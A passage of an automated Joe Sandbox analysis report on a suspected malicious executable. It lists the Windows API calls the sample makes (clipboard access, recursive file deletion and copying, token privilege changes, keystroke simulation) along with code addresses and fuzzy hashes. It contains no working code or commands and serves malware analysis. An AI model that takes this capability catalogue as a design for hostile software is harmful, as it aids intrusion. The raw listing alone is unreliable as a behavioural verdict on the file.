                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: %d/%02d/%02d
                                                        • API String ID: 3850602802-328681919
                                                        • Opcode ID: ed19b323601bf6751bf9ae26c61c6734a141644bdce2a78f92b3ece460aba9cf
                                                        • Instruction ID: ab001b2db5f435ffe087427dac87888f77cc6c9807bca9129f496016b9bb7eb7
                                                        • Opcode Fuzzy Hash: ed19b323601bf6751bf9ae26c61c6734a141644bdce2a78f92b3ece460aba9cf
                                                        • Instruction Fuzzy Hash: 9A12DD71600308AFEB258F25CC49FAA7BF8FF4A314F145129F956BA2D1DB71A906CB11
                                                        APIs
                                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 00E5EB4A
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EB3AEA
                                                        • IsIconic.USER32(000000FF), ref: 00EB3AF3
                                                        • ShowWindow.USER32(000000FF,00000009), ref: 00EB3B00
                                                        • SetForegroundWindow.USER32(000000FF), ref: 00EB3B0A
                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00EB3B20
                                                        • GetCurrentThreadId.KERNEL32 ref: 00EB3B27
                                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00EB3B33
                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00EB3B44
                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00EB3B4C
                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 00EB3B54
                                                        • SetForegroundWindow.USER32(000000FF), ref: 00EB3B57
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EB3B6C
                                                        • keybd_event.USER32(00000012,00000000), ref: 00EB3B77
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EB3B81
                                                        • keybd_event.USER32(00000012,00000000), ref: 00EB3B86
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EB3B8F
                                                        • keybd_event.USER32(00000012,00000000), ref: 00EB3B94
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EB3B9E
                                                        • keybd_event.USER32(00000012,00000000), ref: 00EB3BA3
                                                        • SetForegroundWindow.USER32(000000FF), ref: 00EB3BA6
                                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00EB3BCD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 4125248594-2988720461
                                                        • Opcode ID: c924cd6da0955fd7777d252dc9951b95875209dbc23d00ffccb241ffbd1c19e8
                                                        • Instruction ID: f4fb3b330dfca01ac1a95944d004aecca2dd408065f14a1342da209e0ac981fe
                                                        • Opcode Fuzzy Hash: c924cd6da0955fd7777d252dc9951b95875209dbc23d00ffccb241ffbd1c19e8
                                                        • Instruction Fuzzy Hash: C1319671A44318BFEB215B769C8AFBF7E6CEB44B54F104035FA05FA1D0D6B25D019AA0
                                                        APIs
                                                          • Part of subcall function 00E7B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E7B180
                                                          • Part of subcall function 00E7B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E7B1AD
                                                          • Part of subcall function 00E7B134: GetLastError.KERNEL32 ref: 00E7B1BA
                                                        • _memset.LIBCMT ref: 00E7AD08
                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E7AD5A
                                                        • CloseHandle.KERNEL32(?), ref: 00E7AD6B
                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E7AD82
                                                        • GetProcessWindowStation.USER32 ref: 00E7AD9B
                                                        • SetProcessWindowStation.USER32(00000000), ref: 00E7ADA5
                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E7ADBF
                                                          • Part of subcall function 00E7AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E7ACC0), ref: 00E7AB99
                                                          • Part of subcall function 00E7AB84: CloseHandle.KERNEL32(?,?,00E7ACC0), ref: 00E7ABAB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                        • String ID: $H*$default$winsta0
                                                        • API String ID: 2063423040-3938961404
                                                        • Opcode ID: 4ca8406c3999dd1af46d37d7ac8865cdf7792b5a5e5ca6d34559c3efa10fb575
                                                        • Instruction ID: 99bc6a618309a6085b77ed5234bb86053c01bd1e6012f0959a7ed376a06dc992
                                                        • Opcode Fuzzy Hash: 4ca8406c3999dd1af46d37d7ac8865cdf7792b5a5e5ca6d34559c3efa10fb575
                                                        • Instruction Fuzzy Hash: 22816D71900209AFDF119FA4DC49EEEBBB9EF44308F089139F918B6161D7328E55DB62
                                                        APIs
                                                          • Part of subcall function 00E86EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E85FA6,?), ref: 00E86ED8
                                                          • Part of subcall function 00E86EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E85FA6,?), ref: 00E86EF1
                                                          • Part of subcall function 00E8725E: __wsplitpath.LIBCMT ref: 00E8727B
                                                          • Part of subcall function 00E8725E: __wsplitpath.LIBCMT ref: 00E8728E
                                                          • Part of subcall function 00E872CB: GetFileAttributesW.KERNEL32(?,00E86019), ref: 00E872CC
                                                        • _wcscat.LIBCMT ref: 00E86149
                                                        • _wcscat.LIBCMT ref: 00E86167
                                                        • __wsplitpath.LIBCMT ref: 00E8618E
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00E861A4
                                                        • _wcscpy.LIBCMT ref: 00E86209
                                                        • _wcscat.LIBCMT ref: 00E8621C
                                                        • _wcscat.LIBCMT ref: 00E8622F
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00E8625D
                                                        • DeleteFileW.KERNEL32(?), ref: 00E8626E
                                                        • MoveFileW.KERNEL32(?,?), ref: 00E86289
                                                        • MoveFileW.KERNEL32(?,?), ref: 00E86298
                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00E862AD
                                                        • DeleteFileW.KERNEL32(?), ref: 00E862BE
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E862E1
                                                        • FindClose.KERNEL32(00000000), ref: 00E862FD
                                                        • FindClose.KERNEL32(00000000), ref: 00E8630B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                        • String ID: \*.*
                                                        • API String ID: 1917200108-1173974218
                                                        • Opcode ID: 3d80816ac235ddc1badbc793fec11edc2f98974744cda3fe17ca405ff6139d73
                                                        • Instruction ID: 3dd0d930011ed9879e95d657bda8e75a7acd81d9428182b06bdc231408331a38
                                                        • Opcode Fuzzy Hash: 3d80816ac235ddc1badbc793fec11edc2f98974744cda3fe17ca405ff6139d73
                                                        • Instruction Fuzzy Hash: 2D510D7280911C6ACB21FB91DC45EEBB7FCAF05304F0911EAE58DB2151DA3697498FA4
                                                        APIs
                                                        • OpenClipboard.USER32(00EDDC00), ref: 00E96B36
                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00E96B44
                                                        • GetClipboardData.USER32(0000000D), ref: 00E96B4C
                                                        • CloseClipboard.USER32 ref: 00E96B58
                                                        • GlobalLock.KERNEL32(00000000), ref: 00E96B74
                                                        • CloseClipboard.USER32 ref: 00E96B7E
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00E96B93
                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00E96BA0
                                                        • GetClipboardData.USER32(00000001), ref: 00E96BA8
                                                        • GlobalLock.KERNEL32(00000000), ref: 00E96BB5
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00E96BE9
                                                        • CloseClipboard.USER32 ref: 00E96CF6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                        • String ID:
                                                        • API String ID: 3222323430-0
                                                        • Opcode ID: a9135d19c91f41b9c141e3b35459faea3c9738dd1dd181f5375807fd4c3f3df2
                                                        • Instruction ID: 66a8ff591e389a40f00eb93c9d97b9c373065ea0fbb77b6ae9edf086cb6dd468
                                                        • Opcode Fuzzy Hash: a9135d19c91f41b9c141e3b35459faea3c9738dd1dd181f5375807fd4c3f3df2
                                                        • Instruction Fuzzy Hash: 30519F312042016FD704AF65DD46F6EB7E8AB84B00F00143AF696F61A1EB62D80ACA62
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00E8F62B
                                                        • FindClose.KERNEL32(00000000), ref: 00E8F67F
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E8F6A4
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E8F6BB
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E8F6E2
                                                        • __swprintf.LIBCMT ref: 00E8F72E
                                                        • __swprintf.LIBCMT ref: 00E8F767
                                                        • __swprintf.LIBCMT ref: 00E8F7BB
                                                          • Part of subcall function 00E6172B: __woutput_l.LIBCMT ref: 00E61784
                                                        • __swprintf.LIBCMT ref: 00E8F809
                                                        • __swprintf.LIBCMT ref: 00E8F858
                                                        • __swprintf.LIBCMT ref: 00E8F8A7
                                                        • __swprintf.LIBCMT ref: 00E8F8F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                        • API String ID: 835046349-2428617273
                                                        • Opcode ID: 51632572125efd79f82bd8f45509893d4bf5119ee0ebafb24b4c46182b01dbc3
                                                        • Instruction ID: a93c1427675c14edca95202ab7233ee5881ebd45c9444e6c3e21227ac347ad17
                                                        • Opcode Fuzzy Hash: 51632572125efd79f82bd8f45509893d4bf5119ee0ebafb24b4c46182b01dbc3
                                                        • Instruction Fuzzy Hash: 7AA12F72408344ABC350EBA5DC85DAFB7ECAF99304F441D2EF685A3152EB34E949C762
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00E91B50
                                                        • _wcscmp.LIBCMT ref: 00E91B65
                                                        • _wcscmp.LIBCMT ref: 00E91B7C
                                                        • GetFileAttributesW.KERNEL32(?), ref: 00E91B8E
                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00E91BA8
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00E91BC0
                                                        • FindClose.KERNEL32(00000000), ref: 00E91BCB
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00E91BE7
                                                        • _wcscmp.LIBCMT ref: 00E91C0E
                                                        • _wcscmp.LIBCMT ref: 00E91C25
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E91C37
                                                        • SetCurrentDirectoryW.KERNEL32(00EF39FC), ref: 00E91C55
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E91C5F
                                                        • FindClose.KERNEL32(00000000), ref: 00E91C6C
                                                        • FindClose.KERNEL32(00000000), ref: 00E91C7C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                        • String ID: *.*
                                                        • API String ID: 1803514871-438819550
                                                        • Opcode ID: e2409716491defbca7546f734705e313b62233ded4d32b1cf67308704ed58b66
                                                        • Instruction ID: 5600645c8a57a63a05dba50fe4c2603bbcc8d9c1a61457637445d366e63489e4
                                                        • Opcode Fuzzy Hash: e2409716491defbca7546f734705e313b62233ded4d32b1cf67308704ed58b66
                                                        • Instruction Fuzzy Hash: C831F33254521AAFCF14EBB1EC48EEEB3AC9F45364F0411E6E911F20A0EB71DA458A64
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00E91CAB
                                                        • _wcscmp.LIBCMT ref: 00E91CC0
                                                        • _wcscmp.LIBCMT ref: 00E91CD7
                                                          • Part of subcall function 00E86BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E86BEF
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00E91D06
                                                        • FindClose.KERNEL32(00000000), ref: 00E91D11
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00E91D2D
                                                        • _wcscmp.LIBCMT ref: 00E91D54
                                                        • _wcscmp.LIBCMT ref: 00E91D6B
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E91D7D
                                                        • SetCurrentDirectoryW.KERNEL32(00EF39FC), ref: 00E91D9B
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E91DA5
                                                        • FindClose.KERNEL32(00000000), ref: 00E91DB2
                                                        • FindClose.KERNEL32(00000000), ref: 00E91DC2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                        • String ID: *.*
                                                        • API String ID: 1824444939-438819550
                                                        • Opcode ID: 59a67ec583c06e45e7045cee4a661eb1599e7ee7508178843b260eceadbd5d8f
                                                        • Instruction ID: 972e24a4bf057a73bdc1a95d8493503687ab05d520620a5f2ea755f4a0f438b1
                                                        • Opcode Fuzzy Hash: 59a67ec583c06e45e7045cee4a661eb1599e7ee7508178843b260eceadbd5d8f
                                                        • Instruction Fuzzy Hash: E131243254521F6ECF15EBB0EC08EEEB7AC9F45328F1415E1E811B31A0DB71DA46CA64
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                        • API String ID: 2102423945-2023335898
                                                        • Opcode ID: d141da32494029f1d966205b5dcfa9a5969c2542703f7eb16f4195ace5f840a0
                                                        • Instruction ID: 174ed99ce7247d1314afbb385cd4f670fc127062aa64eee26ea6d0d6cfaac3b3
                                                        • Opcode Fuzzy Hash: d141da32494029f1d966205b5dcfa9a5969c2542703f7eb16f4195ace5f840a0
                                                        • Instruction Fuzzy Hash: 4282B071D04219CBCB24CF98D8817EEBBB1FF48314F25A16AD859BB251E7349D85CB90
                                                        APIs
                                                        • GetLocalTime.KERNEL32(?), ref: 00E909DF
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E909EF
                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E909FB
                                                        • __wsplitpath.LIBCMT ref: 00E90A59
                                                        • _wcscat.LIBCMT ref: 00E90A71
                                                        • _wcscat.LIBCMT ref: 00E90A83
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E90A98
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E90AAC
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E90ADE
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E90AFF
                                                        • _wcscpy.LIBCMT ref: 00E90B0B
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00E90B4A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                        • String ID: *.*
                                                        • API String ID: 3566783562-438819550
                                                        • Opcode ID: 780f348ed638013a907abf4b222f89e7653830fbfccf6648ee3e6dd8c1aa7de2
                                                        • Instruction ID: f54d2f7b7a8bd53189352c0696ce3dd6db3ad3313db32bf835165d7d4c116326
                                                        • Opcode Fuzzy Hash: 780f348ed638013a907abf4b222f89e7653830fbfccf6648ee3e6dd8c1aa7de2
                                                        • Instruction Fuzzy Hash: 53615A725083059FCB10EF60D84499EB3E8FF89314F44592DF989E7252DB31EA49CB92
                                                        APIs
                                                          • Part of subcall function 00E7ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00E7ABD7
                                                          • Part of subcall function 00E7ABBB: GetLastError.KERNEL32(?,00E7A69F,?,?,?), ref: 00E7ABE1
                                                          • Part of subcall function 00E7ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00E7A69F,?,?,?), ref: 00E7ABF0
                                                          • Part of subcall function 00E7ABBB: HeapAlloc.KERNEL32(00000000,?,00E7A69F,?,?,?), ref: 00E7ABF7
                                                          • Part of subcall function 00E7ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00E7AC0E
                                                          • Part of subcall function 00E7AC56: GetProcessHeap.KERNEL32(00000008,00E7A6B5,00000000,00000000,?,00E7A6B5,?), ref: 00E7AC62
                                                          • Part of subcall function 00E7AC56: HeapAlloc.KERNEL32(00000000,?,00E7A6B5,?), ref: 00E7AC69
                                                          • Part of subcall function 00E7AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E7A6B5,?), ref: 00E7AC7A
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E7A6D0
                                                        • _memset.LIBCMT ref: 00E7A6E5
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E7A704
                                                        • GetLengthSid.ADVAPI32(?), ref: 00E7A715
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00E7A752
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E7A76E
                                                        • GetLengthSid.ADVAPI32(?), ref: 00E7A78B
                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E7A79A
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00E7A7A1
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E7A7C2
                                                        • CopySid.ADVAPI32(00000000), ref: 00E7A7C9
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E7A7FA
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E7A820
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E7A834
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                        • String ID:
                                                        • API String ID: 3996160137-0
                                                        • Opcode ID: 17b5657ab68d8c91b39a5be3b979c0e35f7e211499c7e6dc2011141d3f4513d3
                                                        • Instruction ID: e1cb3104cbf8e45f49a260fe416333dfca902d4771855befd9abfe405117b36e
                                                        • Opcode Fuzzy Hash: 17b5657ab68d8c91b39a5be3b979c0e35f7e211499c7e6dc2011141d3f4513d3
                                                        • Instruction Fuzzy Hash: 28514C71900209AFDF049F95DC49EEEBBB9FF44304F089139E925B6291D7369A06CB61
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$
                                                        • API String ID: 0-699356676
                                                        • Opcode ID: 8e7bab03c177c8f6d3a2025bf46dd4af870d54c463754b627c5273438eafcde6
                                                        • Instruction ID: b19d459b454e7bd529dc5d1e23d38419544c202a27ec00c2f91c6dc8da331ceb
                                                        • Opcode Fuzzy Hash: 8e7bab03c177c8f6d3a2025bf46dd4af870d54c463754b627c5273438eafcde6
                                                        • Instruction Fuzzy Hash: 0F728C71E042198BDB24CF98D980BEEB7B5BF48314F14916EE955FB280DB719E81CB90
                                                        APIs
                                                          • Part of subcall function 00E86EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E85FA6,?), ref: 00E86ED8
                                                          • Part of subcall function 00E872CB: GetFileAttributesW.KERNEL32(?,00E86019), ref: 00E872CC
                                                        • _wcscat.LIBCMT ref: 00E86441
                                                        • __wsplitpath.LIBCMT ref: 00E8645F
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00E86474
                                                        • _wcscpy.LIBCMT ref: 00E864A3
                                                        • _wcscat.LIBCMT ref: 00E864B8
                                                        • _wcscat.LIBCMT ref: 00E864CA
                                                        • DeleteFileW.KERNEL32(?), ref: 00E864DA
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E864EB
